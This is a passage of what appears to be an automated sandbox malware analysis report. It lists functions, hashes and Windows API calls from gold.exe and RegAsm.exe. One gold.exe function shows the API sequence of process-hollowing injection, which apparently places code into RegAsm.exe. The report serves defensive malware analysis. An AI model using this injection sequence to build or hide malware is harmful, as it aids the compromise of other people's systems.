Memory Dump Source

Source File: 00000009.00000002.3813319105.0000000000211000.00000040.00000001.01000000.00000007.sdmp, Offset: 00210000, based on PE: true

Associated: 00000009.00000002.3813192530.0000000000210000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3813319105.0000000000272000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3813601680.0000000000279000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.000000000027B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.00000000004E9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000519000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000523000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000531000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3822411389.0000000000532000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3826555608.00000000006D5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3826663852.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_210000_axplong.jbxd

Yara matches

Similarity

API ID: Xtime_diff_to_millis2_xtime_get
String ID:
API String ID: 531285432-0
Opcode ID: b30ce24ecddd7f9ea8f6cbd1364e10fe6bcec1e7ecbc90645aef1c9f631563b9
Instruction ID: 4bc34ad3fb6b3aafdda81d98184c38216df42a00931d3161ddc9faa8b3b2a945
Opcode Fuzzy Hash: b30ce24ecddd7f9ea8f6cbd1364e10fe6bcec1e7ecbc90645aef1c9f631563b9
Instruction Fuzzy Hash: 15215C71E10129AFDF11EFE4EC859AEBBB8AF08314F500025F901A7250DB70AD518BA1

Function 00227040 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 236COMMON

Download Yara Rule

APIs

__Mtx_init_in_situ.LIBCPMT ref: 0022726C

Strings

@.!, xrefs: 00227250
`z", xrefs: 00227282

Memory Dump Source

Source File: 00000009.00000002.3813319105.0000000000211000.00000040.00000001.01000000.00000007.sdmp, Offset: 00210000, based on PE: true

Associated: 00000009.00000002.3813192530.0000000000210000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3813319105.0000000000272000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3813601680.0000000000279000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.000000000027B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.00000000004E9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000519000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000523000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000531000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3822411389.0000000000532000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3826555608.00000000006D5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3826663852.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_210000_axplong.jbxd

Yara matches

Similarity

API ID: Mtx_init_in_situ
String ID: @.!$`z"
API String ID: 3366076730-2136468260
Opcode ID: dcc6be8f0b0112800041a32a1a7bea2bdd4165cd16c33b16d69a61e00eb35d6e
Instruction ID: 01be75bfd2e4ba623a90134ec57c721649bac1a06073ef212970f5a1f2c3ee4b
Opcode Fuzzy Hash: dcc6be8f0b0112800041a32a1a7bea2bdd4165cd16c33b16d69a61e00eb35d6e
Instruction Fuzzy Hash: 8BA147B0A15625DFCB21CFA8D88479EBBF0BF48710F18815AE819AB351E7759D11CF80

Function 00228E70 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 197COMMON

Download Yara Rule

Strings

P#!, xrefs: 0021246D
P#!, xrefs: 00212486

Memory Dump Source

Source File: 00000009.00000002.3813319105.0000000000211000.00000040.00000001.01000000.00000007.sdmp, Offset: 00210000, based on PE: true

Associated: 00000009.00000002.3813192530.0000000000210000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3813319105.0000000000272000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3813601680.0000000000279000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.000000000027B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.00000000004E9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000519000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000523000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000531000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3822411389.0000000000532000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3826555608.00000000006D5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3826663852.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_210000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID: P#!$P#!
API String ID: 0-1913402883
Opcode ID: a731ea745d98861b0b8194c9b382f937b5511d491e3b02c0e0afa0b535d246f1
Instruction ID: cab5f33443a27a7f690a27282dabc9e1804468d4244da1abe5a95278ab278eeb
Opcode Fuzzy Hash: a731ea745d98861b0b8194c9b382f937b5511d491e3b02c0e0afa0b535d246f1
Instruction Fuzzy Hash: 7D512B72920129ABCB14DFA8EC41AAEB7E9EF44300F504569F915DB341DB70EE708BD1

Function 0024F21F Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0024F263

Strings

`'', xrefs: 0024F235
8"', xrefs: 0024F30B

Memory Dump Source

Source File: 00000009.00000002.3813319105.0000000000211000.00000040.00000001.01000000.00000007.sdmp, Offset: 00210000, based on PE: true

Associated: 00000009.00000002.3813192530.0000000000210000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3813319105.0000000000272000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3813601680.0000000000279000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.000000000027B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.00000000004E9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000519000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000523000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000531000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3822411389.0000000000532000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3826555608.00000000006D5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3826663852.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_210000_axplong.jbxd

Yara matches

Similarity

API ID: ___free_lconv_mon
String ID: 8"'$`''
API String ID: 3903695350-657299237
Opcode ID: 03bdbae460325a4ba103bda005261e1ebe0a54249dd7a9b3e183d339b8d8df75
Instruction ID: 71c6640651303b764e192982e5cf9101d42b2fbc50eb033ba4c12ae45bf34cd6
Opcode Fuzzy Hash: 03bdbae460325a4ba103bda005261e1ebe0a54249dd7a9b3e183d339b8d8df75
Instruction Fuzzy Hash: 963150316203069FEBA9AF78EA45B5677E9AF84310F10446AE84AD7151DF71EC608F11

Function 00213930 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

__Mtx_init_in_situ.LIBCPMT ref: 00213962
__Mtx_init_in_situ.LIBCPMT ref: 002139A1

Strings

pB!, xrefs: 00213940

Memory Dump Source

Source File: 00000009.00000002.3813319105.0000000000211000.00000040.00000001.01000000.00000007.sdmp, Offset: 00210000, based on PE: true

Associated: 00000009.00000002.3813192530.0000000000210000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3813319105.0000000000272000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3813601680.0000000000279000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.000000000027B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.00000000004E9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000519000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000523000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000531000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3822411389.0000000000532000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3826555608.00000000006D5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3826663852.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_210000_axplong.jbxd

Yara matches

Similarity

API ID: Mtx_init_in_situ
String ID: pB!
API String ID: 3366076730-630623387
Opcode ID: b7105dbafef06fe80b156ff9e64100d8b6d831ff21cdda0564d8acad4e23ba8a
Instruction ID: ccff013beb627335cacc578bd266704c3c218221eab7cc485aae4cb039ff9f52
Opcode Fuzzy Hash: b7105dbafef06fe80b156ff9e64100d8b6d831ff21cdda0564d8acad4e23ba8a
Instruction Fuzzy Hash: 554136B0501B059FD720CF18C588B9ABBF5FF44315F148619E86A8B341E7B5EA69CF80

Function 00212440 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 0021247E

Strings

P#!, xrefs: 0021246D
P#!, xrefs: 00212486

Memory Dump Source

Source File: 00000009.00000002.3813319105.0000000000211000.00000040.00000001.01000000.00000007.sdmp, Offset: 00210000, based on PE: true

Associated: 00000009.00000002.3813192530.0000000000210000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3813319105.0000000000272000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3813601680.0000000000279000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.000000000027B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.00000000004E9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000519000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000523000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000531000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3822411389.0000000000532000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3826555608.00000000006D5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3826663852.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_210000_axplong.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID: P#!$P#!
API String ID: 2659868963-1913402883
Opcode ID: aaeb63570e1ad423f98221f509a21b326fc6b6cfcf2a68f33849979d203387e2
Instruction ID: 2a0d3d1817d54a430362ca8968116a31e5b595d3a589ac79bd60f5fbaab6ea06
Opcode Fuzzy Hash: aaeb63570e1ad423f98221f509a21b326fc6b6cfcf2a68f33849979d203387e2
Instruction Fuzzy Hash: 15F0E5B1D2020C67C714EFE4D84188AB7ECDE15310B008A25F654E7500F7B0FAA88B91

Function 00212520 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 29COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00212552

Strings

P#!, xrefs: 00212547
P#!, xrefs: 0021255D

Memory Dump Source

Source File: 00000009.00000002.3813319105.0000000000211000.00000040.00000001.01000000.00000007.sdmp, Offset: 00210000, based on PE: true

Associated: 00000009.00000002.3813192530.0000000000210000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3813319105.0000000000272000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3813601680.0000000000279000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.000000000027B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.00000000004E9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000519000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000523000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000531000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3822411389.0000000000532000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3826555608.00000000006D5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3826663852.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_210000_axplong.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID: P#!$P#!
API String ID: 2659868963-1913402883
Opcode ID: 5b278277560a7c15fd08c500110fb622c10a4e797a8fa95a9538407304c1fa8a
Instruction ID: c74638fa4cc4f9ee0607f07ec865c017374aa7fdd72af8844e1f3d7a00ff7314
Opcode Fuzzy Hash: 5b278277560a7c15fd08c500110fb622c10a4e797a8fa95a9538407304c1fa8a
Instruction Fuzzy Hash: 05F0A771D2120DEBC714DFA8D84198EFBF8AF55300F1082AEE44567200EB705AA4CFD9

Analysis Process: gold.exePID: 1072, Parent PID: 6560COMMON

Execution Graph

Execution Coverage:	36.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	16.2%
Total number of Nodes:	37
Total number of Limit Nodes:	1

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 031F24C9 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 282
threadinjectionmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 031F2638
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 031F264B
Wow64GetThreadContext.KERNEL32(?,00000000), ref: 031F2669
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 031F268D
VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040), ref: 031F26B8
WriteProcessMemory.KERNELBASE(?,00000000,?,?,00000000,?), ref: 031F2710
WriteProcessMemory.KERNELBASE(?,?,?,?,00000000,?,00000028), ref: 031F275B
WriteProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 031F2799
Wow64SetThreadContext.KERNEL32(?,?), ref: 031F27D5
ResumeThread.KERNELBASE(?), ref: 031F27E4

Strings

ress, xrefs: 031F2553
GetP, xrefs: 031F254B
aryA, xrefs: 031F250F
Load, xrefs: 031F2507

Memory Dump Source

Source File: 0000000A.00000002.2010930716.00000000031F2000.00000040.00000800.00020000.00000000.sdmp, Offset: 031F2000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_31f2000_gold.jbxd

Similarity

API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
String ID: GetP$Load$aryA$ress
API String ID: 2687962208-977067982
Opcode ID: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
Instruction ID: 4d94e2240f245f9b00741aafd169dc75c2dd1a5c45a1ad7b78982a75b06e7003
Opcode Fuzzy Hash: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
Instruction Fuzzy Hash: 37B1E67660024AAFDB60CF68CC80BDA77A9FF8C714F158564EA0CAB351D774FA418B94

Function 01580B2A Relevance: 1.8, APIs: 1, Instructions: 286
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtectEx.KERNELBASE(?,041F3594,00000040,?,?), ref: 01580EC4

Memory Dump Source

Source File: 0000000A.00000002.2010521820.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1580000_gold.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 38cb1d17770668b229a63302ce3d312d458d36beb62307c8f2cec7433c90972d
Instruction ID: ae8b142638db4357b08e2438ba093b1e3426bbffe4c44fb56288331f2d869bf6
Opcode Fuzzy Hash: 38cb1d17770668b229a63302ce3d312d458d36beb62307c8f2cec7433c90972d
Instruction Fuzzy Hash: C5C17170A042599FCB02DFA9C8806AEFFF1FF49314F588559E854EB296C374E945CBA0

Function 01580EFA Relevance: 1.6, APIs: 1, Instructions: 69
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNELBASE(00000000,00000000,00000000,00000000,?,?), ref: 01580F99

Memory Dump Source

Source File: 0000000A.00000002.2010521820.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1580000_gold.jbxd

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 503a0d7a773c8c09cba4414ebfd3f63e8b995392930725c6551f0bf50a77c1b6
Instruction ID: 70a6882ff9dc0a86d2bc650a04dbc67dd5ace991e3dc8286da80af71738c75bb
Opcode Fuzzy Hash: 503a0d7a773c8c09cba4414ebfd3f63e8b995392930725c6551f0bf50a77c1b6
Instruction Fuzzy Hash: 41210FB59002099FDB10CF99D984BDEBBF0FF48310F20842AE829A7350D375AA14CFA0

Function 015804F0 Relevance: 1.6, APIs: 1, Instructions: 68
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNELBASE(00000000,00000000,00000000,00000000,?,?), ref: 01580F99

Memory Dump Source

Source File: 0000000A.00000002.2010521820.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1580000_gold.jbxd

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 9a8f678f060f52cc7c496787846d0e407e82ac5e173bffc3c86ad514ed887b68
Instruction ID: 674f980c097f120cdc83a42888d6c8f39b4734fb5ba36cda5dddc44e45769cc5
Opcode Fuzzy Hash: 9a8f678f060f52cc7c496787846d0e407e82ac5e173bffc3c86ad514ed887b68
Instruction Fuzzy Hash: 3221F3B59002499FDB10DF9AD984BDEBBF4FF48310F10842AE929A7350D375AA54CFA4

Function 015804D0 Relevance: 1.6, APIs: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtectEx.KERNELBASE(?,041F3594,00000040,?,?), ref: 01580EC4

Memory Dump Source

Source File: 0000000A.00000002.2010521820.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1580000_gold.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 03e172875822b27f73584b7435a0cfec4555c931dfdd45442da3ebd34862b443
Instruction ID: 6dfce02e81b85bd3137afa8c8b4cd5213d0222c1ce6bba47cb0c1eb7d0de36dd
Opcode Fuzzy Hash: 03e172875822b27f73584b7435a0cfec4555c931dfdd45442da3ebd34862b443
Instruction Fuzzy Hash: 1A2120B2801259AFCB00DF9AC884ADEFFB4FF49310F10805AE918AB251D375A518CFA5

Function 015804E4 Relevance: 1.6, APIs: 1, Instructions: 55
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtectEx.KERNELBASE(?,041F3594,00000040,?,?), ref: 01580EC4

Memory Dump Source

Source File: 0000000A.00000002.2010521820.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1580000_gold.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: e81d07c6e431d261e62871427fc38985e92a0befcbdcdb86376e75daf90e6a95
Instruction ID: 3a916effb20bf74f4be21f61cf935951514c8f78bf68ae19119288311804fd4c
Opcode Fuzzy Hash: e81d07c6e431d261e62871427fc38985e92a0befcbdcdb86376e75daf90e6a95
Instruction Fuzzy Hash: 9221E0B5901659EFCB00DF9AD984ADEFBB4FF48310F10812AE918B7250D375A914CFA1

Analysis Process: RegAsm.exePID: 1692, Parent PID: 1072COMMON

Execution Graph

Execution Coverage:	10.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	207
Total number of Limit Nodes:	10

Executed Functions

Function 06873ED8 Relevance: 1.6, APIs: 1, Instructions: 60
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 06873F3D

Memory Dump Source

Source File: 0000000C.00000002.2292175582.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6870000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: edf615434b9a2fbe39e070d40ceaf9905179e70670f068afaa73fb4333e5313f
Instruction ID: 8bbf8a5dccf8fc6287049bf5de6650d13a819fd4b53ae03874c2279c28955035
Opcode Fuzzy Hash: edf615434b9a2fbe39e070d40ceaf9905179e70670f068afaa73fb4333e5313f
Instruction Fuzzy Hash: 1821CE74E01218DFCB08DFAAE484ADDBBF2BB8A320F10902AE515B7360DB749841CF54

Function 06878799 Relevance: .5, Instructions: 504COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2292175582.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6870000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 085c49f333cf21209f004d830e362b77e9c4974f3d48d0ba33d4daf9b3d0f7bd
Instruction ID: ce5ced21a718614b19a3b475f0d71dd7afc8b176eaa0265ebeacdea234b49a5f
Opcode Fuzzy Hash: 085c49f333cf21209f004d830e362b77e9c4974f3d48d0ba33d4daf9b3d0f7bd
Instruction Fuzzy Hash: 6532BE70A01228CFDB64DF65C890BDEB7B2BF89300F1085E9D50AAB254DB359E81DF95

Function 0687AC28 Relevance: .4, Instructions: 434COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2292175582.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6870000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6daef8efbe753a0b948fcead191fc1ef25486adcc25926a37c47202a0c58def6
Instruction ID: dd84ff98da054250d4936ae6f150e1d194cfc3f8a46f0bce81b4b546b49564cf
Opcode Fuzzy Hash: 6daef8efbe753a0b948fcead191fc1ef25486adcc25926a37c47202a0c58def6
Instruction Fuzzy Hash: 4A228C74D01229CFDBA5DF69C890BDDBBB2AF49300F1085EAD549A7250EB319E85CF90

Function 065B67D8 Relevance: .4, Instructions: 424COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2286923212.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_65b0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ccbc08ede870ae405586fd1e20a4423c7f1267d13fce839eb4a73c276e38b9f4
Instruction ID: d3a5b2d8a00f3d7298b7152ef4929c4b729c32b79043e5345f2783ee804c68d2
Opcode Fuzzy Hash: ccbc08ede870ae405586fd1e20a4423c7f1267d13fce839eb4a73c276e38b9f4
Instruction Fuzzy Hash: 66F19C70A002099FDB55DF64D884B9EBBF2FF88310F14856AE505EB2A1DB34ED45CBA1

Function 065BA688 Relevance: .3, Instructions: 298COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2286923212.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_65b0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73b876e3ad4f532a33a214cb83036a8f6e808cdca7439d2c559b2ca607fa0b2b
Instruction ID: f122a1d7735559c4e5c8faa4f7cc8305338942fa7464150d24dc82b7945d7909
Opcode Fuzzy Hash: 73b876e3ad4f532a33a214cb83036a8f6e808cdca7439d2c559b2ca607fa0b2b
Instruction Fuzzy Hash: 01D1F474E00318CFCB18EFB4D89469DBBB2FF8A316F1081A9D50AAB255DB315986CF11

Function 065BA6B8 Relevance: .3, Instructions: 289COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2286923212.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_65b0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d3ca656c4338335c3b2f1567e44de7769dfbcbc37a2602742adf16611ca2e08
Instruction ID: 10631ab49d420cdc4fb0119112f2e9e36ad1568fb914967341d9337dd521c13f
Opcode Fuzzy Hash: 3d3ca656c4338335c3b2f1567e44de7769dfbcbc37a2602742adf16611ca2e08
Instruction Fuzzy Hash: 8DD1E474A00318CFCB18EFB4D854A9DBBB2FF8A316F1081A9D51AAB254DB315D86CF11

Function 02A9AE30 Relevance: 1.7, APIs: 1, Instructions: 185
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000C.00000002.2214365169.0000000002A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2a90000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6eb31de373b779e440fb182fbdb047fe4097364f31fd34a954594cc2ab0ac926
Instruction ID: 22f5c9893012b5e858f07ae66b9a2a77fdedd5cfb33e2b4a62c461bd781fa0ef
Opcode Fuzzy Hash: 6eb31de373b779e440fb182fbdb047fe4097364f31fd34a954594cc2ab0ac926
Instruction Fuzzy Hash: AC7107B0A00B058FDB24DF2AD58575ABBF5FF88304F10892ED48AC7A51DB75E846CB91

Function 06873CFA Relevance: 1.6, APIs: 1, Instructions: 126
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserExceptionDispatcher.NTDLL ref: 06873E50

Memory Dump Source

Source File: 0000000C.00000002.2292175582.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6870000_RegAsm.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: c538c8c154178110c4c527f334e0365f802c3f100c4d8eb2f98f44ccb3aeaf1c
Instruction ID: 0a7390af3e70c0b4b1c540f87a15df6511be41a26df819cd7a69ace70bb6ef11
Opcode Fuzzy Hash: c538c8c154178110c4c527f334e0365f802c3f100c4d8eb2f98f44ccb3aeaf1c
Instruction Fuzzy Hash: CA51C374E01208DFDB58DFA5D584AAEBBF6FF89300F10842AE415A7258DB349D46DF81

Function 05160AA8 Relevance: 1.6, APIs: 1, Instructions: 116
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05161E02

Memory Dump Source

Source File: 0000000C.00000002.2271725394.0000000005160000.00000040.00000800.00020000.00000000.sdmp, Offset: 05160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5160000_RegAsm.jbxd

Similarity

API ID: CreateWindow
